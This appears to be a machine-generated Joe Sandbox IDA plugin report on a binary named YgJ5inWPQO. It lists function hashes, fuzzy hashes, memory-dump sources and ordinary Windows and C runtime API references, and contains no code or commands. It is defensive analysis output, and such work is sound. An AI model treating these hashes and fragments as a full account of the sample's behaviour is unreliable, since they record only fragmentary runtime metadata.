• Opcode ID: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
• Instruction ID: c2acd07a565e386ac312abf6f36a38e48317dc5d6bc808492fb01e9d945daff6
• Opcode Fuzzy Hash: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
• Instruction Fuzzy Hash: 19314372609BC196EB609F60E8403EE73A1FB84704F84413ADA6D47B98EF3CD558C750
APIs
• _get_daylight.LIBCMT ref: 00007FF7FF5A5CB5
  • Part of subcall function 00007FF7FF5A5608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7FF5A561C
  • Part of subcall function 00007FF7FF59A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF7FF5A2D92,?,?,?,00007FF7FF5A2DCF,?,?,00000000,00007FF7FF5A3295,?,?,?,00007FF7FF5A31C7), ref: 00007FF7FF59A9CE
  • Part of subcall function 00007FF7FF59A9B8: GetLastError.KERNEL32(?,?,?,00007FF7FF5A2D92,?,?,?,00007FF7FF5A2DCF,?,?,00000000,00007FF7FF5A3295,?,?,?,00007FF7FF5A31C7), ref: 00007FF7FF59A9D8
  • Part of subcall function 00007FF7FF59A970: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7FF59A94F,?,?,?,?,?,00007FF7FF59A83A), ref: 00007FF7FF59A979
  • Part of subcall function 00007FF7FF59A970: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7FF59A94F,?,?,?,?,?,00007FF7FF59A83A), ref: 00007FF7FF59A99E
• _get_daylight.LIBCMT ref: 00007FF7FF5A5CA4
  • Part of subcall function 00007FF7FF5A5668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7FF5A567C
• _get_daylight.LIBCMT ref: 00007FF7FF5A5F1A
• _get_daylight.LIBCMT ref: 00007FF7FF5A5F2B
• _get_daylight.LIBCMT ref: 00007FF7FF5A5F3C
• GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7FF5A617C), ref: 00007FF7FF5A5F63
Similarity
• API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
• String ID:
• API String ID: 4070488512-0
• Opcode ID: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
• Instruction ID: 19577b267cfca23daac5ff011ebdbb43c71149401190becd7be0bf4097eda078
• Opcode Fuzzy Hash: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
• Instruction Fuzzy Hash: DBD1C026A0928286EB24BF35D4409F9A791FF45B84FC48235EA3D476D6DF3CE46187A0
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1239891234-0
                                                                                                                                                                                                      • Opcode ID: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                                                                                                                      • Instruction ID: 33fa9eb35eca640c0c64bb445f1c715feab2f126a69611951d5a1ba6ec53cb56
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A0319632618BC196DB60DF64E8402EEB3A4FB88754F940236EAAD43BA9DF3CC155C750
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2227656907-0
                                                                                                                                                                                                      • Opcode ID: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
                                                                                                                                                                                                      • Instruction ID: 02d96841ccad658c57baafa351ff0ad6bfcc1f1b2a693bf5a34f38f384d63759
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
                                                                                                                                                                                                      • Instruction Fuzzy Hash: ABB1E622B1A6C641EF60AB6194101F9E391EB45BE4F845332DE7E47BC5EE3CE451CBA0
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF7FF5A5F1A
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF5A5668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7FF5A567C
                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF7FF5A5F2B
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF5A5608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7FF5A561C
                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF7FF5A5F3C
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF5A5638: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7FF5A564C
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF59A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF7FF5A2D92,?,?,?,00007FF7FF5A2DCF,?,?,00000000,00007FF7FF5A3295,?,?,?,00007FF7FF5A31C7), ref: 00007FF7FF59A9CE
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF59A9B8: GetLastError.KERNEL32(?,?,?,00007FF7FF5A2D92,?,?,?,00007FF7FF5A2DCF,?,?,00000000,00007FF7FF5A3295,?,?,?,00007FF7FF5A31C7), ref: 00007FF7FF59A9D8
                                                                                                                                                                                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7FF5A617C), ref: 00007FF7FF5A5F63
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3458911817-0
                                                                                                                                                                                                      • Opcode ID: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
                                                                                                                                                                                                      • Instruction ID: b6ef958c8ac94739bf6d8f76c05d987a231373268d83bf905ddb53313eeba5ea
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B8517232A0968286E720FF35D8815E9E760BB49B84FC45235EA7D436D6DF3CE45187E0
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2933794660-0
                                                                                                                                                                                                      • Opcode ID: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                                                                                                                                                                      • Instruction ID: d956370f095327b0a8fec152f3f840f2f1dfe7a48a71acb42c300fac3105d4b8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 15114C22B15B458AEB00DB60E8542F973B4FB19758F840E31DA3D477A4DF38D1648390
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: memcpy_s
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1502251526-0
                                                                                                                                                                                                      • Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                      • Instruction ID: 8905af6f71f7964b555679a9f8e29820ce2ea6318be740451705dcad4fe59915
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6BC10572B1A2C687D7249F59A0846BAF791F794788F808234DB6E57784DF3DE811CB80
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: $header crc mismatch$unknown header flags set
                                                                                                                                                                                                      • API String ID: 0-1127688429
                                                                                                                                                                                                      • Opcode ID: 41de47797cb66f1826093f4b1d60416fd99d26d25a53ce6bfd127eaa39bdfb5e
                                                                                                                                                                                                      • Instruction ID: ad51a6e68d4b5467d695309855bf2a143709a1e70b094d277d5e64a8331876af
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 41de47797cb66f1826093f4b1d60416fd99d26d25a53ce6bfd127eaa39bdfb5e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 20F1C472A093C55BE795AF14C088BBABAA9FF45740F464278DA79477D1CF38E440CB90
Memory Dump Source
• Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
• Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
Similarity
• API ID: ExceptionRaise_clrfp
• String ID:
• API String ID: 15204871-0
Similarity
• API ID:
• String ID: $
• API String ID: 0-227171996
Similarity
• API ID:
• String ID: incorrect header check$invalid window size
• API String ID: 0-900081337
Similarity
• API ID:
• String ID: e+000$gfff
• API String ID: 0-3030954782
Similarity
• API ID: CurrentFeaturePresentProcessProcessor
• String ID:
• API String ID: 1010374628-0
Similarity
• API ID:
• String ID: gfffffff
• API String ID: 0-1523873471
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: TMP
• API String ID: 3215553584-3125297090
                                                                                                                                                                                                      • Opcode ID: 5f14576829c2a404d65bc8e6713cc3c63392e5e443677cfdf71167dbae88db0a
                                                                                                                                                                                                      • Instruction ID: 3ebc97b0d841bf40273a5bd3b97859fba34819f103c60bd7b627b92533d2c98f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5f14576829c2a404d65bc8e6713cc3c63392e5e443677cfdf71167dbae88db0a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3D51B011B096C241FB7CBB2659011FAD2906F45BC5FC94634DE3E4BBD2EE3CE40242A8
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: HeapProcess
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 54951025-0
                                                                                                                                                                                                      • Opcode ID: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
                                                                                                                                                                                                      • Instruction ID: 2ae1a06c84b23108d3b6578163a2a44667cc35ecd56f8e8a5705536a8dcbc4c6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 64B09220E07A86D2EF083B21AC8265866A4BF48700FD80239C03E52370DE2C24F557A0
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 5f2a1199bc68cddcf3b08423a19983f3afdde0c7e054ddf4c3f66946da216a90
                                                                                                                                                                                                      • Instruction ID: 26bdc9d54fa2706911e6d412de1feacc4c1cd3ee440e24d0c496ad7d90e877ce
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5f2a1199bc68cddcf3b08423a19983f3afdde0c7e054ddf4c3f66946da216a90
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 11D1C766A08682C5EB3CAF25C0502BDA7A9EB05B48F954335CE3D276D5CF3DE945C3A0
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 069bb313382d3adaff5ac451a95cb3dd74dda88d5dd80987c9f0d361d468a953
                                                                                                                                                                                                      • Instruction ID: a3298dd1c795d9989f13f75f62d537c141be1d421859e1ee2b2c5dd48ed9a8f7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 069bb313382d3adaff5ac451a95cb3dd74dda88d5dd80987c9f0d361d468a953
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DFC1A0762181E08BD289EB29E4694BA73D0F78930EBD5416BEF87477C5CB3CA414DB60
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 2617fd8e8f043c0917c6a56c5cabdca8b91b1cd744d59a3c82f21f331bc63c74
                                                                                                                                                                                                      • Instruction ID: c58f0eb45f6bd358d794fe9a7e688809c7c251cc2ed2c4df10977808cb21206a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2617fd8e8f043c0917c6a56c5cabdca8b91b1cd744d59a3c82f21f331bc63c74
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A2B17F729087C585F7789F29C0901BCBBA0E745B48FA45239CA6D473D5CFB9D441C7A0
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 73948b09e9837a821f5a3b4bbb106c60bdc2a86aaa707f45330964650836ebfe
                                                                                                                                                                                                      • Instruction ID: 2297b4536b18c5886addec34dc26ea9178f23ae7ccb855635c7d76ab880ac86c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 73948b09e9837a821f5a3b4bbb106c60bdc2a86aaa707f45330964650836ebfe
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3981F272A087D187EB789B19E4803BABA91FB45794F844335DABD03BC5CE3DE4008B60
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                      • Opcode ID: b78332369169aed8be6dd13cc6d08ed8a401c1151d3c5d6e5b3c154adaf735d2
                                                                                                                                                                                                      • Instruction ID: a5a91c10672adc1cc839c15c83573fa6a9e60bf2ba52f742e4ffca596ecdd88a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b78332369169aed8be6dd13cc6d08ed8a401c1151d3c5d6e5b3c154adaf735d2
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F9612A22E0E6D246FB34AA28C4442FDE690AF45B60FD84339D63D476C5DE7DE8108BB0
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 12404f4f4f1323fea4d4e583727f71dd7b5a0d93f2e51056eadc76cf5c92dd81
                                                                                                                                                                                                      • Instruction ID: 61f5a816dc5e8c80989272e4c13adbced7c5efae7552ce0fb6851e80ead4d874
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 12404f4f4f1323fea4d4e583727f71dd7b5a0d93f2e51056eadc76cf5c92dd81
